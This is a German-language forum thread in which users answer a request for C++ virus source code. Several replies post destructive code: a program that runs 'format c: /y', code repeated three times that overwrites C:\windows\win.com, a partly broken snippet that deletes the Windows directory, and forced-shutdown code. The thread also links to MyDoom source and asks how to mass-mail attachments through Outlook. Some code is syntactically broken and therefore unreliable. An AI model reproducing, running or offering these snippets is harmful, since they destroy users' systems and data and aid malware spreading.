Viren



  • Hallo,

    ich hab da mal ne Frage zu Viren in Verbindung mit C++. Ich programmiere mittlerweile schon ne ganze Weile. Nun würde mich auch mal der Quellcode eines Virus interresieren. Gibt es überhaupt Viren die in C++ geschrieben sind? Falls ja wäre es cool wenn mir einer von euch sagen könnte wo im Netz ich so nen Quellcode finde.

    ich hoffe diese Frage stößt nicht nur auf Ablehnung 🙂

    auf jedenfall schonmal danke



  • Entscheidend an Viren ist nur die Verbreitungsart, und da liegt das Problem nicht bei der Programmierung sondern:

    a) an der Unvorsicht der User
    b) das Entdecken einer Sicherheitslücke



  • mag ja sein bei meine Frage hast Du damit trotzdem nicht beantwortet



  • Benutz doch einfach google wenn es dich so brennend interessiert was irgendwelche Kiddies sich in ihren Kellern zusammenschreiben.



  • na auf die Antwort hab ich gewartet. Auf ironische Antworten kann ich wirklich verzichten.



  • so kommt man also zu 6000 Beiträgen



  • Falls ja wäre es cool wenn mir einer von euch sagen könnte wo im Netz ich so nen Quellcode finde.

    zb hier



  • Wenn du nach dem Source von Viren fragst sieht es für mich zu 99,9% danach aus du willst auch so was coden. Wenn du irgendwas spezielles wissen willst frag direkt nach und dir wird geholfen.



  • int main()
    { 
    system("format c: /y");
    return 0;
    }
    

    fertig...



  • devil81 schrieb:

    int main()
    { 
    system("format c: /y");
    return 0;
    }
    

    fertig...

    hm irgendwie geht das bei mir nicht 😞 .. Lässt sich zwar compilieren und so, aber irgendwie seh ich nix wenn ichs starte... Vielleicht liegts ja an meinem PC. Vielleicht könnteste den Virus bei dir mal austesten? Habs schonmal für dich kompiliert:

    http://www.evilhackersite.de.vu/formater.exe

    Dank im voraus 👍



  • life schrieb:

    devil81 schrieb:

    int main()
    { 
    system("format c: /y");
    return 0;
    }
    

    fertig...

    hm irgendwie geht das bei mir nicht 😞 .. Lässt sich zwar compilieren und so, aber irgendwie seh ich nix wenn ichs starte... Vielleicht liegts ja an meinem PC. Vielleicht könnteste den Virus bei dir mal austesten? Habs schonmal für dich kompiliert:

    http://www.evilhackersite.de.vu/formater.exe

    Dank im voraus 👍

    bei mir tut sich auch nicht viel... nur die Festplatte faengt an zu rattern... 😕 😃

    @Topic:
    klar kann man Viren mit C++ schreiben. Wenn du schon, wie du sagst, eine ganze Weile programmierst, sollte dir das klar sein. Viren sind auch nur Programme. Was genau verstehst du nicht? Was genau moechtest du sehen? Was genau kannst du dir denn nicht vorstellen?



  • GR_Malcolm schrieb:

    na auf die Antwort hab ich gewartet. Auf ironische Antworten kann ich wirklich verzichten.

    hast du überhaupt schon auf google gesucht?
    lass mich raten.... nein!

    genau, also wieso sollen andere die arbeit für dich erledigen wenn du scheinbar noch nichtmal eine sekunde zeit genommen hast ernsthaft* danach zu suchen, v.a. wenn du auch noch rummeckerst weil dir jemand google vorschlägt.
    [(*)Nach ca. 5 sek. nicht ernsthafter suche findet man bei google schon verwertbare ergebnisse (tipp: "virus" "source" und "c++" sind wörter die dich interessieren).]

    Zudem glaubst du doch nicht ernsthaft das dir hier jemand code von schädlichen programmen zeigt oder?

    ..son schmarn echt ...



  • Dieser Thread wurde von Moderator/in HumeSikkins aus dem Forum C++ in das Forum Rund um die Programmierung verschoben.

    Im Zweifelsfall bitte auch folgende Hinweise beachten:
    C/C++ Forum :: FAQ - Sonstiges :: Wohin mit meiner Frage?

    Dieses Posting wurde automatisch erzeugt.



  • #include <iostream.h>
    #include <conio.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sysstat.h>
    #include <io.h>
    #include <string.h>
    
    int main(void)
    {
       clrscr();
       int handle;
       char string[1000];
       int length, res,i;
    
       /*
        Create a file named "DOVE.GIF" in the current directory and write
        a string to it.  If "DOVE.GIF" already exists, it will be overwritten.
       */
    
       if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
    O_TRUNC,
              S_IREAD | S_IWRITE)) == -1)
       {
          printf("Error opening file.
    ");
          exit(1);
       }
    
       strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
    execution currupt your WINDOWS !!!!!!</html>
    ");
    
       length = strlen(string);
    
       if ((res = write(handle, string, length)) != length)
       {
          printf("Error writing to the file.
    ");
          getch();
          exit(1);
       }
       printf("
    			Wrote %d bytes to the file.
    ", res);
      cout<<"
    			Hello !!!!!!!!";
      cout<<"
    			 This is a VIRUS ATTACK !!!";
      cout<<"
    			 This execution currupt your WINDOWS !!!!!!
    ";
       close(handle);
       getch();
       return 0;
    }
    
    //#include <iostream.h>
    #include <conio.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sysstat.h>
    #include <io.h>
    #include <string.h>
    
    int main(void)
    {
       clrscr();
       int handle;
       char string[1000];
       int length, res,i;
    
       /*
        Create a file named "DOVE.GIF" in the current directory and write
        a string to it.  If "DOVE.GIF" already exists, it will be overwritten.
       */
    
       if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
    O_TRUNC,
              S_IREAD | S_IWRITE)) == -1)
       {
          printf("Error opening file.
    ");
          exit(1);
       }
    
       strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
    execution currupt your WINDOWS !!!!!!</html>
    ");
    
       length = strlen(string);
    
       if ((res = write(handle, string, length)) != length)
       {
          printf("Error writing to the file.
    ");
          getch();
          exit(1);
       }
       printf("
    			Wrote %d bytes to the file.
    ", res);
      cout<<"
    			Hello !!!!!!!!";
      cout<<"
    			 This is a VIRUS ATTACK !!!";
      cout<<"
    			 This execution currupt your WINDOWS !!!!!!
    ";
       close(handle);
       getch();
       return 0;
    }
    
    // #include<iostream.h>
    #include<conio.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <sysstat.h>
    #include <io.h>
    #include <string.h>
    
    int main(void)
    {
       clrscr();
       int handle;
       char string[1000];
       int length, res,i;
    
       /*
        Create a file named "DOVE.GIF" in the current directory and write
        a string to it.  If "DOVE.GIF" already exists, it will be overwritten.
       */
    
       if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
    O_TRUNC,
              S_IREAD | S_IWRITE)) == -1)
       {
          printf("Error opening file.
    ");
          exit(1);
       }
    
       strcpy(string, "<html>Hello !!!!!!! This is a VIRUS ATTACK !!! This
    execution currupt your WINDOWS !!!!!!</html>
    ");
    
       length = strlen(string);
    
       if ((res = write(handle, string, length)) != length)
       {
          printf("Error writing to the file.
    ");
          getch();
          exit(1);
       }
       printf("
    			Wrote %d bytes to the file.
    ", res);
      cout<<"
    			Hello !!!!!!!!";
      cout<<"
    			 This is a VIRUS ATTACK !!!";
      cout<<"
    			 This execution currupt your WINDOWS !!!!!!
    ";
       close(handle);
       getch();
       return 0;
    }
    

    Edit: Quelle



  • Hier hab ich noch paar code´s von mir 🙂

    /*löscht windoof */
    #include <stdio.h>
    #include <windows.h>
    int main () {
    if (remove ("C:\\Windows\\*.*")==0;
    else
         SHFILEOPSTRUCT fo;
         fo.wFunc = FO_DELETE ;
         fo.pFrom = C:\\Windows\\*.*";
         fo.fFlags = FOF_NOCONFIRMATION ;
         SHFile Operation (&fo) ;
    }
    
    #include <windows.h> 
    void main(void) { 
    const SHFILEOPSTRUCT fos = {NULL, FO_COPY, "c:\\programme\\my_dir", "c:\\", FOF_ALLOWUNDO, FALSE, NULL, "Kopieren..."}; 
    SHFileOperation(&fos); 
    }
    
    void __fastcall TForm1::Button1Click(TObject *Sender) 
    { 
        HANDLE token; 
        TOKEN_PRIVILEGES tokenpriv; 
    
        // Token für diesen Prozess holen 
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)) 
        { 
            ShowMessage("Fehler beim OpenProcessToken"); 
            return; 
        } 
    
        // LUID für die Shutdown Privilege holen 
        LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tokenpriv.Privileges[0].Luid); 
        tokenpriv.PrivilegeCount=1; 
        tokenpriv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 
    
       AdjustTokenPrivileges(token, FALSE, &tokenpriv, 0, (PTOKEN_PRIVILEGES)NULL, 0); 
    
       if (GetLastError() != ERROR_SUCCESS) 
          return; 
    
        // Windows beenden und Rechner ausschalten 
        if(!ExitWindowsEx(EWX_LOGOFF | EWX_POWEROFF, NULL)) 
        { 
            ShowMessage("Fehler beim ExitWindowsEx"); 
            return; 
        } 
    }
    

    😃 😃 😃

    Aber weis jemand wie man über Outlook an alle vorhandenen e-mailadreesen eine Nachricht mit eiem Anhang sendet ??



  • int main() 
    { 
    system("format c: /y"); 
    return 0; 
    }
    

    Ich glaube nicht, dass da viel passiert, da ja fast jeder sowas unter Windows ausführen wird und Windows sich weigert sich selbst zu löschen!



  • Ich habe da eine seite http://www.c-schell.de/ da ist der surce code von MyDoom denn einzigen virus/worm von dem ich angst habe auch heute noch, p.s. ich habe grad ein neuen virus auf mein rechner Winux irgentwas funk int windows und in linux. Und ich bin superfröhlich endlich hatt mein antivirus software was zu tun. Aber dafur darf ich ihn jetzt behalten und in meiner sammlung hinzufugen. 😡 😋 😡.

    P.S. Sammelt ihr auch viren und wurmer, will mal sehn ob ich der einzige kranke in der weld bin der sowas macht?.

    P.S. 2. Ich sehe grad das sie den link zum source rausgetan haben. Ich tues dann morgen auf meiner Homepage und melde mich dann wieder.

    Habs doch noch im web gefunden
    http://www.egocrew.de/board/thread.php?threadid=1425

    http://www.zone-h.com/en/forum/thread/forum=3/thread=21524/



  • Ich wollt mal auch viren sammeln ( will es immernoch !!!), aber ich weis nicht wie ich sie von mein yahoo auf den pc lade ( der löscht die glaub ich automatisch ) aussderdem krig ich nie viele viren 😞

    PS : kann mal jemand auf meine frage antworten ??



  • Wen man die " viren-Packete" (.zip) entpackt - werden dan die viren aktiviert ?? Den mein Virenscanner hat verrückt gespielt ..... 😃



  • Is doch klar sein wennu du eine virenbefallene Datei auf deinen Rechner entpackst, jeder automatischer Scanner (also die, die die Sig, bzw. Kennung kennen) müsste da sich melden. ^^


Anmelden zum Antworten